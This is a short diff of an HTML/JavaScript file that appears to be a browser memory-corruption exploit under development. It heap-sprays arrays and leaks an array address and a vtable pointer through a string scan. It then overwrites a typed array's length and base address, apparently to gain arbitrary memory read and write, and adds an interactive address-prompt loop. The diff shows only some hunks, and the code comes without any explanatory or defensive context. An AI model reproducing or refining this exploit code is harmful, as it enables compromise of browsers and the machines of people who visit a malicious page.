--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start18");
+alert("start19");
 var spray=new Array(0x800);
 var tmp;
  for(var i=0;i<spray.length;i+=2){
@@ -95,11 +95,16 @@ while(s1.charCodeAt(a)!=0xFFFB){
  a+=1;
 }
 var arr_addr=(s1.charCodeAt(a-1)<<16)+s1.charCodeAt(a-2)
-alert(arr_addr.toString(16));
+//alert(arr_addr.toString(16));
 a=arr_addr/2;
 var vftable=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
-alert(vftable.toString(16));
+//alert(vftable.toString(16));
+for(var i=typedarray_index;i<typedarray_index+0x40/4;i++){
+ spray[spray_index][typedarray_index]=0;
+}
 spray[spray_index][typedarray_index]=vftable;
+spray[spray_index][typedarray_index+0x30/4]=0x10000;//length
+spray[spray_index][typedarray_index+0x38/4]=0xffffffff;//addr;
 while(1){
 a=prompt("addr");
 b="";
